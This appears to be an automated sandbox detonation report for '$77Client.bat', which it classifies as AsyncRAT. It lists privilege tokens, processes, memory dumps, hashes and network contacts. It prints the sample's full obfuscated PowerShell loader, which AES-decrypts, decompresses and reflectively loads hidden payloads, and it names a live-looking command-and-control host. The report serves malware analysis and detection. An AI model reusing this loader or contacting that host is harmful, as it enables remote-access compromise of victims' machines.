Analysis Overview
SHA256
5390de25fad8a66fe3f2fa552338a94f128ea04f615c8a37db7a5c74096e71cd
Threat Level: Known bad
The file $77Client.bat was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Drops file in System32 directory
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-15 13:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-15 13:19
Reported
2024-06-15 13:19
Platform
win10-20240404-en
Max time kernel
34s
Max time network
23s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\SleepStudy\user-not-present-trace-2024-06-15-13-19-32.etl | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\SleepStudy\user-not-present-trace-2024-06-15-13-19-32.etl | C:\Windows\system32\svchost.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k rpcss
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$77Client.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ksw8SAQi50b5VVVT8JAhNTRFtTw0A9NOUx0RCJki1ys='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hbqwyNJWc+2u3I84IJ2MwA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cSrAG=New-Object System.IO.MemoryStream(,$param_var); $XlGOh=New-Object System.IO.MemoryStream; $BsZhc=New-Object System.IO.Compression.GZipStream($cSrAG, [IO.Compression.CompressionMode]::Decompress); $BsZhc.CopyTo($XlGOh); $BsZhc.Dispose(); $cSrAG.Dispose(); $XlGOh.Dispose(); $XlGOh.ToArray();}function execute_function($param_var,$param2_var){ $SrgSB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NTToy=$SrgSB.EntryPoint; $NTToy.Invoke($null, $param2_var);}$BBkFc = 'C:\Users\Admin\AppData\Local\Temp\$77Client.bat';$host.UI.RawUI.WindowTitle = $BBkFc;$qHXrh=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BBkFc).Split([Environment]::NewLine);foreach ($fdTIR in $qHXrh) { if ($fdTIR.StartsWith('HIearqRTqSNaefXJxubI')) { $LRRoy=$fdTIR.Substring(20); break; }}$payloads_var=[string[]]$LRRoy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | paris-disciplinary.gl.at.ply.gg | udp |
| US | 147.185.221.19:63286 | paris-disciplinary.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 19.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.131.50.23.in-addr.arpa | udp |
| US | 147.185.221.19:63286 | paris-disciplinary.gl.at.ply.gg | tcp |
Files
memory/5100-1-0x00007FF83E4B3000-0x00007FF83E4B4000-memory.dmp
memory/5100-5-0x0000028CB9DE0000-0x0000028CB9E02000-memory.dmp
memory/5100-8-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp
memory/5100-10-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vky2qnc5.22a.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5100-36-0x0000028CB9F90000-0x0000028CB9FCC000-memory.dmp
memory/5100-47-0x0000028CBA3E0000-0x0000028CBA456000-memory.dmp
memory/5100-56-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp
memory/5100-57-0x0000028CB9FD0000-0x0000028CB9FD8000-memory.dmp
memory/5100-58-0x0000028CB9FE0000-0x0000028CBA016000-memory.dmp
memory/5100-59-0x0000028CBA010000-0x0000028CBA022000-memory.dmp
memory/3416-62-0x00000000005F0000-0x000000000061A000-memory.dmp
memory/352-112-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/1396-116-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/732-120-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/1732-119-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/2296-125-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/1600-117-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/3416-115-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/1240-114-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/1180-113-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/2224-122-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/1808-121-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/2148-118-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/1492-111-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/1376-110-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/2268-109-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/1168-108-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/2664-127-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/4792-126-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/5092-124-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/624-123-0x00007FF81B000000-0x00007FF81B010000-memory.dmp
memory/5100-159-0x00007FF83E4B3000-0x00007FF83E4B4000-memory.dmp
memory/5100-160-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp
memory/5100-161-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp
memory/5100-162-0x0000028CBA370000-0x0000028CBA3D8000-memory.dmp
memory/5100-164-0x0000028CBABE0000-0x0000028CBABFE000-memory.dmp
memory/5100-165-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp